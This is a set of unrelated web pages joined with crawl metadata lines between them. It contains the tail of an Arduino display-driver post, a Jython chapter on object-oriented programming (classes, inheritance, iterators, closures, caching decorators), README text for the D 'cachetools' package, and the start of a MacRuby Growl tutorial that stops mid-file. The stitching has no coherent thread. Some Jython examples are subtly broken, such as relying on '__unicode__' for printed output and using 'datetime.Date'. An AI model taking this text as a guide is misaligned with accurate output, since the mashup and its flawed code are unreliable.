The graphical weather images were downloaded from the Wikimedia Commons library. Please respect the rights of the original authors:
Snow image
Partly cloudy image
Rain image
Sun image
The numeric ‘temperature readout’ was created by typing the numbers 0..9 and the point and degree symbols into Wordpad in a nice font at 48 point size. Then I took a screenshot and used a paint program to crop out each character into its own bitmap and saved each one as a separate PNG.
I then ran the bm2rgbi utility included with the graphics library to convert the PNGs to LZG format and imported those binaries directly into the compiled flash image. You can see how that’s done by reading the example source code.
JPEG support now available
I’m pleased to announce driver support for displaying JPEG images. JPEG images may be compiled into flash and displayed from there or they may be streamed over an Arduino serial connection.
The driver documentation has been updated to include sample code and a demo video that shows you how to do it.
Here’s a link to the video that shows the JPEG decoder operating on images stored in flash. If you’d like to see it operating on JPEG images received over the serial link then please refer to the main driver documentation. The JPEG decoder is completely compatible with the Nokia 6300 as well as the N82.
Can I use it with the standard Arduino?
Yes you can; see this article for a write-up, including performance analysis and optimisations. The article is focused on the 6300, but the N82 works in exactly the same way.
Print your own PCBs
Want to try assembling a board yourself but don’t have a home-etching kit? No problem, just download the Gerber files from my downloads page and use an online prototyping service such as that offered by Seeed Studio, ITead Studio or Elecrow.
|
http://andybrown.me.uk/wk/2012/08/19/nokia-n82-arduino/
|
CC-MAIN-2013-48
|
refinedweb
| 1,605
| 71.44
|
Chapter 5: Object Oriented Jython
This chapter is going to cover the basics of object oriented programming. If you're already familiar with the concepts, feel free to skim. I'll start by covering the basic reasons why you would want to write object oriented code in the first place, then cover all the basic syntax, and finally I'll show you a non-trivial example.
Object oriented programming is a method of programming where you package your code up into bundles of data and behaviour. In Jython, you can define a template for this bundle with a class definition. With this first class written, you can then instantiate copies of your object and have them act upon each other. This helps you organize your code into smaller, more manageable bundles.
Throughout this chapter, I interchangeably use Python and Jython - for regular object oriented programming, the two dialects of Python are so similar that there are no meaningful differences between the two languages. Enough introduction text though - let's take a look at some basic syntax to see what this is all about.
Basic Syntax
Writing a class is really simple. It is fundamentally about managing some kind of 'state' and exposing some functions to manipulate that state. In object jargon - we just call those functions 'methods'.
Let's start by creating a car class. The goal is to create an object that will manage its own location on a two dimensional plane. We want to be able to tell it to turn, move forward, and we want to be able to interrogate the object to find out its current location.
class Car(object):

    NORTH = 0
    EAST = 1
    SOUTH = 2
    WEST = 3

    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y
        self.direction = 0

    def turn_right(self):
        self.direction += 1
        self.direction = self.direction % 4

    def turn_left(self):
        self.direction -= 1
        self.direction = self.direction % 4

    def move(self, distance):
        if self.direction == self.NORTH:
            self.y += distance
        elif self.direction == self.SOUTH:
            self.y -= distance
        elif self.direction == self.EAST:
            self.x += distance
        else:
            self.x -= distance

    def position(self):
        return (self.x, self.y)
We'll go over that class definition in detail but right now, let's just see how to create a car, move it around and ask the car where it is.
from car import Car

def test_car():
    c = Car()
    c.turn_right()
    c.move(5)
    assert (5, 0) == c.position()
    c.turn_left()
    c.move(3)
    assert (5, 3) == c.position()

if __name__ == '__main__':
    test_car()
The best way to think of a class is to think of it like a special kind of function that acts as a factory that generates object instances. For each call to the class, you are creating a new discrete copy of your object.
Once we've created the car instance, we can simply call functions that are attached to the car class and the object will manage its own location. From the point of view of our test code, we do not need to manage the location of the car, nor do we need to manage the direction that the car is pointing in. We just tell it to move - and it does the right thing.
Let's go over the syntax in detail to see exactly what's going on here.
In line 1, we declare that our Car object is a subclass of the root "object" class. Python, like many object oriented languages, has a 'root' object that all other objects are based off of. This 'object' class defines basic behavior that all classes can reuse.
Python actually has two kinds of classes - 'new-style' and 'old-style'. The old way of declaring classes didn't require you to type 'object' - you'll occasionally see the old-style class usage in some Python code, but it's not considered a good practice. Just subclass 'object' for any of your base classes and your life will be simpler [1].
Lines 3 to 6 declare class attributes for the direction that any car can point to. These are class attributes so they can be shared across all object instances of the car object.
Now for the good stuff.
Lines 8 to 11 declare the object initializer. In some languages, you might be familiar with a constructor - in Jython, we have an initializer which lets us pass values into an object at the time of creation.
In our initializer, we are setting the initial position of the car to (0, 0) on a 2 dimensional plane and then the direction of the car is initialized to pointing north. Fairly straight forward so far.
The function signature uses Python's default argument list feature so we don't have to explicitly set the initial location to (0,0), but there's a new argument introduced called 'self'. This is a reference to the current object.
Remember - your class definition is creating instances of objects. Once your object is created, it has its own set of internal variables to manage. Your object will inevitably need to access these as well as any of the class's internal methods. Python will pass a reference to the current object as the first argument to all your instance methods.
If you're coming from some other object oriented language, you're probably familiar with the 'this' variable. Unlike C++ or Java, Python doesn't magically introduce the reference into the namespace of accessible variables, but this is consistent with Python's philosophy of making things explicit for clarity.
When we want to assign the initial x,y position, we just need to assign values to the names 'x' and 'y' on the object. Binding the values of x and y to self makes the position values accessible to any code that has access to self - namely the other methods of the object. One minor detail here - in Python, you can technically name the arguments however you want. There's nothing stopping you from calling the first argument 'this' instead of 'self', but the community standard is to use 'self' [2].
Lines 13 to 19 declare two methods to turn the vehicle in different directions. Notice how the direction is never directly manipulated by the caller of the Car object. We just asked the car to turn, and the car changed its own internal 'direction' state.
Lines 21 to 29 define where the car should move to when we move the car forward. The internal direction variable informs the car how it should manipulate the x and y position. Notice how the caller of the car object never needs to know precisely what direction the car is pointing in. The caller only needs to tell the object to turn and move forward. The particular details of how that message is used are abstracted away.
That's not too bad for a couple dozen lines of code.
This concept of hiding internal details is called encapsulation. This is a core concept in object oriented programming. As you can see from even this simple example - it allows you to structure your code so that you can provide a simplified interface to the users of your code.
Having a simplified interface means that we could have all kinds of behaviour happening behind the function calls to turn and move - but the caller can ignore all those details and concentrate on using the car instead of managing the car.
As long as the method signatures don't change, the caller really doesn't need to care about any of that. We can easily add persistence to this class - so we can save and load the car's state to disk.
First, pull in the pickle module - pickle will let us convert python objects into byte strings that can be restored to full objects later.
import pickle
Now, just add two new methods to load and save the state of the object.
def save(self):
    state = (self.direction, self.x, self.y)
    pickle.dump(state, open('mycar.pickle', 'wb'))

def load(self):
    state = pickle.load(open('mycar.pickle', 'rb'))
    (self.direction, self.x, self.y) = state
Simply add calls to save() at the end of the turn and move methods, and the object will automatically save all the relevant internal values to disk.
People who use the car object don't even need to know that it's saving to disk, because the Car object handles it behind the scenes.
def turn_right(self):
    self.direction += 1
    self.direction = self.direction % 4
    self.save()

def turn_left(self):
    self.direction -= 1
    self.direction = self.direction % 4
    self.save()

def move(self, distance):
    if self.direction == self.NORTH:
        self.y += distance
    elif self.direction == self.SOUTH:
        self.y -= distance
    elif self.direction == self.EAST:
        self.x += distance
    else:
        self.x -= distance
    self.save()
Now, when you call the turn or move methods, the car will automatically save itself to disk. If you want to reconstruct the car object's state from a previously saved pickle file, you can simply call the load() method.
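As a quick sanity check, here is a short usage sketch (my own, not from the chapter) that round-trips the car's state through the pickle file:

car = Car()
car.turn_right()     # now facing EAST
car.move(5)          # position is (5, 0); move() also saved state to mycar.pickle

restored = Car()     # a fresh car at (0, 0), facing NORTH...
restored.load()      # ...until we restore the pickled state
assert restored.position() == (5, 0)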
Object Attribute Lookups
If you've been paying attention, you're probably wondering how the NORTH, SOUTH, EAST and WEST variables got bound to self. We never actually assigned them to the self variable during object initialization - so what's going on when we call move()? How is Jython actually resolving the value of those four variables?
Now seems like a good time to show how Jython resolves name lookups.
The direction names actually got bound to the Car class. The Jython object system does a little bit of magic: when you try accessing any name on an object, it first searches for anything that was bound to 'self'. If Python can't resolve any attribute on self with that name, it goes up the object graph to the class definition. The direction attributes NORTH, SOUTH, EAST, WEST were bound to the class definition - so the name resolution succeeds and we get the value of the class attribute.
A very short example will help clarify this:
>>> class Foobar(object):
...     def __init__(self):
...         self.somevar = 42
...     class_attr = 99
...
>>>
>>> obj = Foobar()
>>> obj.somevar
42
>>> obj.class_attr
99
>>> obj.not_there
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'Foobar' object has no attribute 'not_there'
>>>
So the key difference here is what you bind a value to. The values you bind to self are available only to a single object. Values you bind to the class definition are available to all instances of the class. The sharing of class attributes among all instances is a critical distinction because mutating a class attribute will affect all instances. This may cause unintended side effects if you're not paying attention as a variable may change value on you when you aren't expecting it to.
>>> other = Foobar()
>>> other.somevar
42
>>> other.class_attr
99
>>> # obj and other will have different values for somevar
>>> obj.somevar = 77
>>> obj.somevar
77
>>> other.somevar
42
>>> # Now show that class_attr is shared - rebind it on the class itself
>>> Foobar.class_attr = 66
>>> other.class_attr
66
>>> obj.class_attr
66
I think it's important to stress just how transparent Python's object system really is. Object attributes are just stored in a plain python dictionary. You can directly access this dictionary by looking at the __dict__ attribute.
>>> obj = Foobar()
>>> obj.__dict__
{'somevar': 42}
Notice that there are no references to the methods of the class, or the class attribute. I'll reiterate it again - Python is going to just go up your inheritance graph and go to the class definition to look for the methods of Foobar and the class attributes of Foobar.
The same trick can be used to inspect all the attributes of the class: just look into the __dict__ attribute of the class definition and you'll find your class attributes and all the methods that are attached to your class definition:
>>> Foobar.__dict__
{'__module__': '__main__', 'class_attr': 99,
 '__dict__': <attribute '__dict__' of 'Foobar' objects>,
 '__init__': <function __init__ at 1>}
This transparency can be leveraged with dynamic programming techniques, using closures and binding new functions into your class definition at runtime. We'll revisit this later in the chapter when we look at generating functions dynamically, and finally with a short introduction to metaprogramming.
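As a small taste of what that transparency enables, here is a sketch (not from the chapter) that uses a closure to generate a function and bind it into the class definition at runtime:

def make_greeter(greeting):
    # A closure capturing 'greeting'; once bound to the class it
    # behaves like any other instance method.
    def greet(self):
        return "%s, somevar is %s" % (greeting, self.somevar)
    return greet

# Bind the generated function onto the class at runtime; both existing
# and future instances find it through the normal attribute lookup rules.
Foobar.greet = make_greeter("Hello")

obj = Foobar()
print obj.greet()    # prints: Hello, somevar is 42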
Inheritance and Overloading
In the car example, we subclass from the root object type. You can also subclass your own classes to specialize the behaviour of your objects. You may want to do this if you notice that your code naturally has a structure where you have many different classes that all share some common behaviour.
With objects, you can write one class, and then reuse it using inheritance to automatically gain access to the pre-existing behavior and attributes of the parent class. Your 'base' objects will inherit behaviour from the root 'object' class, but any subsequent subclasses will inherit from your own classes.
Let's take a simple example of using some animal classes to see how this works. Define a module "animals.py" with the following code:
class Animal(object):

    def sound(self):
        return "I don't make any sounds"

class Goat(Animal):

    def sound(self):
        return "Bleeattt!"

class Rabbit(Animal):

    def jump(self):
        return "hippity hop hippity hop"

class Jackalope(Goat, Rabbit):
    pass
Now you should be able to explore that module with the jython interpreter:
>>> from animals import *
>>> animal = Animal()
>>> goat = Goat()
>>> rabbit = Rabbit()
>>> jack = Jackalope()
>>> animal.sound()
"I don't make any sounds"
>>> animal.jump()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'Animal' object has no attribute 'jump'
>>> rabbit.sound()
"I don't make any sounds"
>>> rabbit.jump()
'hippity hop hippity hop'
>>> goat.sound()
'Bleeattt!'
>>> goat.jump()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'Goat' object has no attribute 'jump'
>>> jack.jump()
'hippity hop hippity hop'
>>> jack.sound()
'Bleeattt!'
Inheritance is a very simple concept: when you declare your class, you simply specify which parent classes you would like to reuse. Your new class can then automatically access all the methods and attributes of the super class. Notice how the goat couldn't jump and the rabbit couldn't make any sound, but the Jackalope had access to methods from both the rabbit and the goat.
With single inheritance - when your class simply inherits from one parent class - the rules for resolving where to find an attribute or a method are very straight forward. Jython just looks up to the parent if the current object doesn't have a matching attribute.
It's important to point out now that the Rabbit class is a type of Animal - the Python runtime can tell you that programmatically by using the isinstance function:
>>> isinstance(rabbit, Rabbit)
True
>>> isinstance(rabbit, Animal)
True
>>> isinstance(rabbit, Goat)
False
For many classes, you may want to extend the behavior of the parent class instead of just completely overriding it. For this, you'll want to use super(). Let's specialize the Rabbit class like this:
class EasterBunny(Rabbit):
    def sound(self):
        orig = super(EasterBunny, self).sound()
        return "%s - but I have eggs!" % orig
If you now try making this rabbit speak, it will extend the original sound() method from the base Rabbit class:
>>> bunny = EasterBunny()
>>> bunny.sound()
"I don't make any sounds - but I have eggs!"
That wasn't so bad. For these examples, I only demonstrated that inherited methods can be invoked, but you can do exactly the same thing with attributes that are bound to self.
For multiple inheritance, things get very tricky. In fact, the rules for resolving how attributes are looked up would easily fill an entire chapter (look up "The Python 2.3 Method Resolution Order" on Google if you don't believe me). There's not enough space in this chapter to properly cover the topic which should be a good indication to you that you really don't want to use multiple inheritance.
More advanced abstraction
Abstraction using plain classes is wonderful and all, but it's even better if your code seems to naturally fit into the syntax of the language. Python supports a variety of underscore methods - methods that start and end with double underscores - that let you overload the behaviour of your objects. This means that your objects will seem to integrate more tightly with the language itself.
With the underscore methods, you can give your objects behaviour for logical and mathematical operations. You can even make your objects behave more like standard builtin types like lists, sets or dictionaries.
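As a quick taste of that - Deck below is a hypothetical class, not part of this chapter's running example - implementing just __len__ and __getitem__ is enough for an object to support len(), indexing and even iteration:

class Deck(object):
    def __init__(self, cards):
        self._cards = list(cards)
    def __len__(self):
        return len(self._cards)
    def __getitem__(self, position):
        return self._cards[position]

>>> deck = Deck(['ace', 'king', 'queen'])
>>> len(deck)
3
>>> deck[0]
'ace'
>>> list(deck)
['ace', 'king', 'queen']

Now let's look at a small file-handling example: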
from __future__ import with_statement
from contextlib import closing

with closing(open('simplefile','w')) as fout:
    fout.writelines(["blah"])

with closing(open('simplefile','r')) as fin:
    print fin.readlines()
The above snippet of code just opens a file, writes a little bit of text and then we just read the contents out. Not terribly exciting. Most objects in Python are serializable to strings using the pickle module. We can leverage pickle to write out full blown objects to disk. Let's see the functional version of this:
from __future__ import with_statement
from contextlib import closing
from pickle import dumps, loads

def write_object(fout, obj):
    data = dumps(obj)
    fout.write("%020d" % len(data))
    fout.write(data)

def read_object(fin):
    length = int(fin.read(20))
    obj = loads(fin.read(length))
    return obj

class Simple(object):
    def __init__(self, value):
        self.value = value
    def __unicode__(self):
        return "Simple[%s]" % self.value

with closing(open('simplefile','wb')) as fout:
    for i in range(10):
        obj = Simple(i)
        write_object(fout, obj)

print "Loading objects from disk!"
print '=' * 20
with closing(open('simplefile','rb')) as fin:
    for i in range(10):
        print read_object(fin)
This should output something like this:
Loading objects from disk!
====================
Simple[0]
Simple[1]
Simple[2]
Simple[3]
Simple[4]
Simple[5]
Simple[6]
Simple[7]
Simple[8]
Simple[9]
So now we're doing something interesting. Let's look at exactly what's happening here.
First, you'll notice that the Simple object is rendering a nice string representation of itself - the Simple object can render itself using the __unicode__ method. This is clearly an improvement over the default rendering of the object with angle brackets and a hex code.
The write_object function is fairly straight forward, we're just converting our objects into strings using the pickle module, computing the length of the string and then writing the length and the actual serialized object to disk.
This is fine, but the read side is a bit clunky. We don't really know when to stop reading. We can fix this using the iteration protocol, which brings us to one of my favourite reasons to use objects at all in Python.
Protocols
In Python, we have 'duck typing'. If it sounds like a duck, quacks like a duck and looks like a duck - well - it's a duck. This is in stark contrast to more rigid languages like C# or Java which have formal interface definitions. One of the nice benefits of having duck typing is that Python has the notion of object 'protocols'.
If you happen to implement the right methods - Python will recognize your object as a certain type of 'thing'.
Iterators are objects that act like lazy lists - they hand you the next object on demand. Implementing the iterator protocol is straightforward - just implement a next() method and an __iter__ method and you're ready to rock and roll. Let's see this in action:
class PickleStream(object):
    """
    This stream can be used to stream objects off of a raw file stream
    """
    def __init__(self, file):
        self.file = file

    def write(self, obj):
        data = dumps(obj)
        length = len(data)
        self.file.write("%020d" % length)
        self.file.write(data)

    def __iter__(self):
        return self

    def next(self):
        data = self.file.read(20)
        if len(data) == 0:
            raise StopIteration
        length = int(data)
        return loads(self.file.read(length))

    def close(self):
        self.file.close()
The above class will let you wrap a simple file object and you can now send it raw python objects to write to a file, or you can read objects out as if the stream was just a list of objects. Writing and reading becomes much simpler
with closing(PickleStream(open('simplefile','wb'))) as stream:
    for i in range(10):
        obj = Simple(i)
        stream.write(obj)

with closing(PickleStream(open('simplefile','rb'))) as stream:
    for obj in stream:
        print obj
Abstracting out the details of serialization into the PickleStream lets us 'forget' about the details of how we are writing to disk. All we care about is that the object will do the right thing when we call the write() method.
The iteration protocol can be used for much more advanced uses, but even with this example, it should be obvious how useful it is. While you could implement the reading behaviour with a read() method, just using the stream as something you can loop over makes the code much easier to understand.
An aside: a common problem that everyone seems to have
One particular snag that seems to catch every Python programmer is the use of mutable default values in a method signature.
>>> class Tricky(object):
...     def mutate(self, x=[]):
...         x.append(1)
...         return x
...
>>> obj = Tricky()
>>> obj.mutate()
[1]
>>> obj.mutate()
[1, 1]
>>> obj.mutate()
[1, 1, 1]
What's happening here is that the instance method 'mutate' is itself an object. The method object stores the default value for 'x' as part of itself, so when you go and mutate the list, you're actually changing a value held by the method object. Remember - this happens because when you invoke the mutate method, you're just accessing a callable attribute on the Tricky object.
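The usual way out of this trap is to use None as the default and build the fresh list inside the method body - Safe here is just a hypothetical counterpart to Tricky:

class Safe(object):
    def mutate(self, x=None):
        if x is None:
            x = []   # a fresh list is created on every call
        x.append(1)
        return x

>>> obj = Safe()
>>> obj.mutate()
[1]
>>> obj.mutate()
[1]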
Runtime binding of methods
One interesting feature in Python is that instance methods are actually just attributes hanging off of the class definition - the functions are just attributes like any other variable, except that they happen to be 'callable'.
It's even possible to create and bind in functions to a class definition at runtime using the new module to create instance methods. In the following example, you can see that it's possible to define a class with nothing in it, and then bind methods to the class definition at runtime.
>>> def some_func(self, x, y):
...     print "I'm in object: %s" % self
...     return x * y
...
>>> import new
>>> class Foo(object): pass
...
>>> f = Foo()
>>> f
<__main__.Foo object at 0x1>
>>> Foo.mymethod = new.instancemethod(some_func, f, Foo)
>>> f.mymethod(6,3)
I'm in object: <__main__.Foo object at 0x1>
18
When you invoke the 'mymethod' method, the same attribute lookup machinery is being invoked. Python looks up the name against the 'self' object. When it can't find anything there, it goes to the class definition. When it finds it there, the instancemethod object is returned. The function is then called with two arguments and you get to see the final result.
This kind of dynamism in Jython is extremely powerful. You can write code that generates functions at program runtime and then bind those functions to objects. You can do all of this because in Jython, classes are what are known as 'first class objects'. The class definition itself is an actual object - just like any other object. Manipulating classes is as easy as manipulating any other object.
Closures and Passing Objects
Python supports the notion of nested scopes - this can be used to preserve some state information inside of another function. This technique isn't all that common outside of dynamic languages, so you may have never seen this before. Let's look at a simple example:
def adder(x):
    def inner(y):
        return x + y
    return inner

>>> func = adder(5)
>>> func
<function inner at 0x7adf0>
>>> func(8)
13
This is pretty cool - we can actually create functions from templates of other functions. If you can think of a way to parameterize the behavior of a function, it becomes possible to create new functions dynamically. You can think of currying as yet another way of creating templates - this time you are creating a template for new functions.
This is a tremendously powerful tool once you gain some experience with it. Remember - everything in python is an object - even functions are first class objects in Python so you can pass those in as arguments as well. A practical use of this is to partially construct new functions from 'base' functions with some basic known behavior.
Let's take the previous adder closure and convert it to a more general form
def arith(math_func, x):
    def inner(y):
        return math_func(x, y)
    return inner

def adder(x, y):
    return x + y

>>> func = arith(adder, 91)
>>> func(5)
96
This technique is called currying - you're now creating new function objects based on previous functions. The most common use for this is to create decorators. In Python, you can define special kinds of objects that wrap up your methods and add extra behavior. Some decorators are builtin already, like 'property', 'classmethod' and 'staticmethod'. Once you have a decorator, you can sprinkle it on top of another function to add new behavior.
Decorator syntax looks something like this
@decorator_func_name(arg1, arg2, arg3, ...)
def some_functions(x, y, z, ...):
    # Do something useful here
    pass
Suppose we have some method that requires intensive computational resources to run, but the results do not vary much over time. Wouldn't it be nice if we could cache the results so that the computation wouldn't have to run each and every time?
Here's our class with a slow computation method
import time

class Foobar(object):
    def slow_compute(self, *args, **kwargs):
        time.sleep(1)
        return args, kwargs, 42
Now let's cache the value using a decorator function. Our strategy is that for any function named X with some argument list, we want to create a unique name and save the final computed value to that name. We want our cached value to have a human readable name, so we want to reuse the original function name, as well as the arguments that were passed in the first time.
Let's get to some code!
import hashlib

def cache(func):
    """
    This decorator will add a _cache_functionName_HEXDIGEST
    attribute after the first invocation of an instance method
    to store cached values.
    """
    # Obtain the function's name
    func_name = func.func_name

    def inner(self, *args, **kwargs):
        # Compute a unique value for the unnamed and named arguments
        # (this has to happen here, inside inner, where args and
        # kwargs actually exist)
        arghash = hashlib.sha1(str(args) + str(kwargs)).hexdigest()
        cache_name = '_cache_%s_%s' % (func_name, arghash)
        if hasattr(self, cache_name):
            # If we have a cached value, just use it
            print "Fetching cached value from : %s" % cache_name
            return getattr(self, cache_name)
        result = func(self, *args, **kwargs)
        setattr(self, cache_name, result)
        return result
    return inner
There are only two new tricks that are in this code.
- I'm using the hashlib module to convert the arguments to the function into a unique single string.
- The use of getattr, hasattr and setattr to manipulate the cached value on the instance object.
Now, if we want to cache the slow method, we just throw on a @cache line above the method declaration.
@cache
def slow_compute(self, *args, **kwargs):
    time.sleep(1)
    return args, kwargs, 42
Fantastic - we can reuse this cache decorator for any method we want now. Let's suppose now that we want our cache to invalidate itself after a fixed number of calls. This practical use of currying is only a slight modification to the original caching code.
import hashlib

def cache(loop_iter):
    def function_closure(func):
        func_name = func.func_name

        def closure(self, *args, **kwargs):
            arghash = hashlib.sha1(str(args) + str(kwargs)).hexdigest()
            cache_name = '_cache_%s_%s' % (func_name, arghash)
            counter_name = '_counter_%s_%s' % (func_name, arghash)
            if hasattr(self, cache_name):
                # If we have a cached value, just use it
                print "Fetching cached value from : %s" % cache_name
                # decrement the per-instance counter, not the
                # closed-over loop_iter
                counter = getattr(self, counter_name) - 1
                setattr(self, counter_name, counter)
                result = getattr(self, cache_name)
                if counter == 0:
                    delattr(self, counter_name)
                    delattr(self, cache_name)
                    print "Cleared cached value"
                return result
            result = func(self, *args, **kwargs)
            setattr(self, cache_name, result)
            setattr(self, counter_name, loop_iter)
            return result
        return closure
    return function_closure
Now we're free to use @cache for any slow method and caching will come in for free - including automatic invalidation of the cached value. Just use it like this
@cache(10)
def slow_compute(self, *args, **kwargs):
    # TODO: stuff goes here...
    pass
Review - and a taste of how we could fit all of this together
Now - I'm going to ask you to use your imagination a little. We've covered quite a bit of ground really quickly.
We can :
- look up attributes in an object (use the __dict__ attribute).
- check if an object belongs to a particular class hierarchy (use the isinstance function).
- build functions out of other functions using currying, and even bind those functions to arbitrary names.
This is fantastic - we now have all the basic building blocks we need to generate complex methods based on the attributes of our class. Imagine a simplified addressbook application with a simple contact.
class Contact(object):
    first_name = str
    last_name = str
    date_of_birth = datetime.Date
Assuming we know how to save and load to a database, we can use the function generation techniques to automatically generate load() and save() methods and bind them into our Contact class. We can use our introspection techniques to determine what attributes need to be saved to our database. We could even grow special methods onto our Contact class so that we could iterate over all of the class attributes and magically grow 'searchby_first_name' and 'searchby_last_name' methods.
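To make the idea concrete, here is a minimal sketch - the make_search helper and the SQL-ish output are hypothetical, standing in for a real database query:

def make_search(attr_name):
    def search(cls, value):
        # a real implementation would run a database query here
        print "SELECT * FROM contact WHERE %s = '%s'" % (attr_name, value)
    return search

for name in ('first_name', 'last_name'):
    setattr(Contact, 'searchby_' + name, classmethod(make_search(name)))

>>> Contact.searchby_last_name('Smith')
SELECT * FROM contact WHERE last_name = 'Smith'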
See how powerful this can be? We can write extremely minimal code, and we can generate all of our required specialized behavior for saving, loading and searching for records in a database. Since we do all of that programmatically, we can dramatically reduce the amount of code that we have to write by hand - and by doing so, we can reduce the chance that we introduce bugs into our system.
We're going to do exactly that in a later chapter, building a simple database abstraction layer to demonstrate how to create your own object system that will automatically know how to read and write to a database.
cachetools 0.0.7
Collection of cache strategies
To use this package, put the following dependency into your project's dependencies section:
cachetools
This package contains some cache implementations (for example LRU cache) and underlying data structures.
Why you may want to use it? Because it is fast and @safe. It is also @nogc and nothrow (inherited from your key/value types).
Limitations:
Cache implementations do not inherit from an interface or a base class. This is because inheritance and attribute inference don't work well together.
LRU cache
An LRU cache keeps a limited number of items in memory. When adding a new item to an already full cache, some items have to be evicted. Eviction candidates are selected first from expired items (using a per-cache configurable TTL) and then from the least recently accessed items.
Code examples
auto lru = new CacheLRU!(int, string);
lru.size = 2048; // keep 2048 elements in cache
lru.ttl = 60;    // set 60 seconds TTL for items in cache

lru.put(1, "one");
auto v = lru.get(1);
assert(v == "one"); // 1 is in cache
v = lru.get(2);
assert(v.isNull);   // no such item in cache
The default value for ttl is 0, which means no TTL. The default value for size is 1024.
Class instance as key
To use a class as a key with this code, you have to define toHash and opEquals (important: opEquals for the class instance, not Object) as @safe or @trusted (and optionally @nogc if you need it):
import cachetools.hash: hash_function;

class C {
    int s;
    this(int v) {
        s = v;
    }
    override hash_t toHash() const {
        return hash_function(s);
    }
    bool opEquals(const C other) pure const @safe {
        return s == other.s;
    }
}

CacheLRU!(immutable C, string) cache = new CacheLRU!(immutable C, string);
immutable C s1 = new immutable C(1);
cache.put(s1, "one");
auto s11 = cache.get(s1);
assert(s11 == "one");
Cache events
Sometimes you have to know if items are purged from the cache or modified. You can configure the cache to report such events. Important warning: if you enable cache events and do not fetch them after cache operations, the list of stored events will grow without bounds. Code sample:
auto lru = new CacheLRU!(int, string);
lru.enableCacheEvents();
lru.put(1, "one");
lru.put(1, "next one");
assert(lru.get(1) == "next one");
auto events = lru.cacheEvents();
writeln(events);
output:
[CacheEvent!(int, string)(Updated, 1, "one")]
Each CacheEvent has key and val members and the name of the event (Removed, Expired, Changed, Evicted).
Hash Table
Some parts of this package are based on an internal hash table which can be used independently. It is an open-addressing hash table with keys and values stored inline in the buckets array, to avoid unnecessary allocations and to make better use of the CPU cache for small key/value types.
Hash Table supports immutable keys and values. Due to language limitations you can't use structs with immutable/const members.
All hash table code is @safe and requires that user-supplied functions such as toHash or opEquals also be @safe (or @trusted). It is also @nogc if toHash and opEquals are @nogc. opIndex is not @nogc as it can throw an exception.
Several code samples:
import cachetools.containers.hashmap;

string[] words = ["hello", "my", "friend", "hello"];

void main() {
    HashMap!(string, int) counter;
    build0(counter); // build table (verbose variant)
    report(counter);
    counter.clear(); // clear table
    build1(counter); // build table (less verbose variant)
    report(counter);
}

/// verbose variant
void build0(ref HashMap!(string, int) counter) @safe @nogc {
    foreach(word; words) {
        auto w = word in counter;
        if ( w !is null ) {
            (*w)++;            // update
        } else {
            counter[word] = 1; // create
        }
    }
}

/// short variant
void build1(ref HashMap!(string, int) counter) @safe @nogc {
    foreach(word; words) {
        counter.getOrAdd(word, 0)++;
    }
}

void report(ref HashMap!(string, int) hashmap) @safe {
    import std.stdio;
    writefln("keys: %s", hashmap.byKey);
    writefln("values: %s", hashmap.byValue);
    writefln("pairs: %s", hashmap.byPair);
    writeln("---");
}
Output:
keys: ["hello", "friend", "my"] values: [2, 1, 1] pairs: [Tuple!(string, "key", int, "value")("hello", 2), Tuple!(string, "key", int, "value")("friend", 1), Tuple!(string, "key", int, "value")("my", 1)] --- keys: ["hello", "friend", "my"] values: [2, 1, 1] pairs: [Tuple!(string, "key", int, "value")("hello", 2), Tuple!(string, "key", int, "value")("friend", 1), Tuple!(string, "key", int, "value")("my", 1)] ---
I’ve been wanting an excuse to learn how to code for OSX for a while now, and I finally thought of a project worth trying. In an effort to get up and running on XCode and Cocoa as quickly as possible, a number of people suggested I check out MacRuby. I have to say, I’m quite happy with it so far. I was able to find some simple tutorials to get me moving and started putting together some simple native OSX UIs pretty quickly, with UI elements that actually do things.
One of the goals of the app that I want to build is to show Growl notifications at various times, so I started digging into what this would take. I found a few tutorials, various forums and even a few bug tickets that generally gave me the information I needed, but I had to put it all together myself. So, in an effort to help the community a little more, I am going to try and post a complete tutorial on creating a MacRuby app with Growl notifications.
Getting Started – Xcode And The Growl Frameworks
First, you need a Mac and you need to install the latest and greatest Xcode. Start up Xcode and create a new MacRuby project. Give it a name and save it somewhere. Next, you’ll need the Growl frameworks. Xcode comes with several examples of how to work with Growl, but I found them all to be difficult and couldn’t get them working correctly. A few google searches later and I realized Growl delivers a nice framework package from their website.
Go download the Growl SDK from the Growl website. Open the disk image, and in the Frameworks folder, copy both the “Growl.framework” and “Growl-WithInstaller.framework”. Paste these into /Library/Frameworks on your OSX drive. This will make them easier to find from within Xcode.
Adding The Growl Framework To Your Project
Open Xcode and your project, and locate Frameworks in the project tree view. Pick one of the framework groups (I chose "Other" for no apparent reason), right click and "Add Existing Framework". If you copied the growl frameworks into the right folder, they will show up in the list. Otherwise you'll have to hunt for them with the "Add Other" button.
Your project now references Growl, but it won't be able to find it at run time. We have to tell the project to copy the framework to the output folder so it can be found at runtime. Find the Targets node in the project treeview, and find your app's name. Expand that portion of the tree and you will see several build phases. If you have an empty "Copy Files" step, great! If not, you need to right click your app name and "Add" a "New Build Phase" to "Copy Files". If the Copy Files phase doesn't open an "Info" screen, double click on it to open it. In this screen, set the "Destination" to "Frameworks" and leave the "Path" blank.
Close this window.
Now drag the Growl.framework from the “Frameworks/Other Frameworks” tree node, down into the “Copy Files” node that you just added. This will tell Xcode to copy the Growl.framework into your project’s output when it builds.
Configuring Growl To Know About Your App
You can’t just send things to Growl and expect it to magically work. You have to configure your app to use Growl and let Growl know what your app wants to do with it – what notifications you want to set up, what you want on by default, etc. There are several ways to configure your app to work with Growl. I chose to use a .growlRegDict file – a Growl Registration Dictionary. It’s an XML file that defines your app in a manner that Growl understands. You could use code to do the registration as well. There are a lot of examples for doing this online.
Start by adding a file called "Growl Registration Ticket.growlRegDict" to your project. I chose to put this in my Resources folder. I'm not sure if the file must be named this, exactly, but I am fairly certain it has to have the .growlRegDict extension. Once you have the file in place, place the following XML in it:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>TicketVersion</key>
    <integer>1</integer>
    <key>AllNotifications</key>
    <array>
        <string>Test</string>
    </array>
    <key>DefaultNotifications</key>
    <array>
        <string>Test</string>
    </array>
</dict>
</plist>
